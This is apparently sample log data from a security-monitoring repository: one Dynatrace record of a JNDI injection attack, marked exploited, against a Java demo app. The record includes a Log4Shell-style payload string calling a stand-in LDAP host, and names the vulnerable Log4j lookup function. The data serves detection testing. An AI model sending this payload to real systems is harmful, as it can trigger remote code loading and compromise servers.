Azure-Sentinel/Sample Data/DynatraceAttacks_IngestedLo...

4.4 KiB

1TenantIdSourceSystemMGManagementGroupNameTimeGenerated [UTC]ComputerRawDataentrypoint_codeLocation_displayName_sentrypoint_codeLocation_className_sentrypoint_codeLocation_functionName_sentrypoint_codeLocation_parameterTypes_values_sentrypoint_codeLocation_parameterTypes_truncationInfo_truncated_bentrypoint_codeLocation_returnType_sentrypoint_codeLocation_lineNumber_dattackId_sdisplayId_stimestamp_ddisplayName_sattackType_stechnology_sstate_srequest_url_srequest_path_srequest_protocolDetails_http_requestMethod_srequest_protocolDetails_http_headers_values_srequest_protocolDetails_http_headers_truncationInfo_srequest_protocolDetails_http_parameters_values_srequest_protocolDetails_http_parameters_truncationInfo_sentrypoint_entrypointFunction_displayName_sentrypoint_entrypointFunction_className_sentrypoint_entrypointFunction_functionName_sentrypoint_entrypointFunction_parameterTypes_values_sentrypoint_entrypointFunction_parameterTypes_truncationInfo_truncated_bentrypoint_entrypointFunction_returnType_sentrypoint_payload_values_sentrypoint_payload_truncationInfo_truncated_bvulnerability_vulnerabilityId_svulnerability_displayName_svulnerability_codeLocation_displayName_svulnerability_codeLocation_className_svulnerability_codeLocation_functionName_svulnerability_codeLocation_parameterTypes_values_svulnerability_codeLocation_parameterTypes_truncationInfo_truncated_bvulnerability_codeLocation_returnType_svulnerability_codeLocation_lineNumber_dvulnerability_vulnerableFunction_displayName_svulnerability_vulnerableFunction_className_svulnerability_vulnerableFunction_functionName_svulnerability_vulnerableFunction_parameterTypes_values_svulnerability_vulnerableFunction_parameterTypes_truncationInfo_truncated_bvulnerability_vulnerableFunction_returnType_svulnerability_vulnerableFunctionInput_type_svulnerability_vulnerableFunctionInput_inputSegments_sattacker_sourceIp_sattacker_location_countryCode_sattacker_location_country_sattacker_location_city_smanagementZones_sType_ResourceId
20466271e-77e0-47ef-bc01-ee8177ca53eeOpsManager27/10/2023, 11:17:35.0441698405124415_02195243643866821550A-22DAIC1698405124415javax.servlet.ServletRequestWrapper.getParameterValues()JNDI_INJECTIONJAVAEXPLOITED//GET[{"name":"x-client-ip","value":"192.168.1.1"},{"name":"user-agent","value":"axios/0.20.0"},{"name":"host","value":"unguard-proxy-service"},{"name":"accept","value":"application/json, text/plain, */*"},{"name":"x-dynatrace","value":"FW4;-1743916453;7;-359533746;498416;2;-860574453;372;d30e;2h02;3h87179aa2;4h0f4988;5h01;6heed8e7bffd3835c46961d6ded2ae3e75;7h59eb10f60139ab11"},{"name":"traceparent","value":"00-eed8e7bffd3835c46961d6ded2ae3e75-59eb10f60139ab11-01"},{"name":"tracestate","value":"ccb4ad0b-980df25b@dt=fw4;7;ea91f34e;79af0;2;0;0;174;a886;2h02;3h87179aa2;4h0f4988;5h01;7h59eb10f60139ab11"},{"name":"connection","value":"close"}]{"truncated":false}[]{"truncated":true}ServletRequestWrapper.getParameterValues(String)javax.servlet.ServletRequestWrappergetParameterValues["String"]falsejava.lang.String[][{"type":"HTTP_PARAMETER_VALUE","name":"url","value":"${jndi:ldap://evil-server.net:999/CompromiseMachine}"}]false-7037978146758609592JndiManager.lookup():128org.apache.logging.log4j.core.net.JndiManager.lookup(String):128org.apache.logging.log4j.core.net.JndiManagerlookup["String"]falsejava.lang.Object128InitialContext.lookup(String)javax.naming.InitialContextlookup["String"]falsejava.lang.ObjectJNDI[{"value":"ldap://evil-server.net:999/CompromiseMachine","type":"MALICIOUS_INPUT"}]192.168.1.1DEGermanyRottenburg[{"id":"2843874372046580667","name":"Dev2Dev Demo 2"},{"id":"2631544906797876001","name":"Infrastructure Linux (incl PG)"},{"id":"5996194749094481086","name":"XXXXX-TestZone"},{"id":"1674365597043557983","name":"XXXX Test"},{"id":"8696294048462936180","name":"excemptions test"},{"id":"8097065485878182312","name":"java"},{"id":"-8367998469205081223","name":"pgTestMz"},{"id":"-2661345213750943630","name":"XXXXX-java-MZ"},{"id":"-432603006836851299","name":"XXXX-mz"},{"id":"5322819311624991300","name":"unguard"}]DynatraceAttacks_CL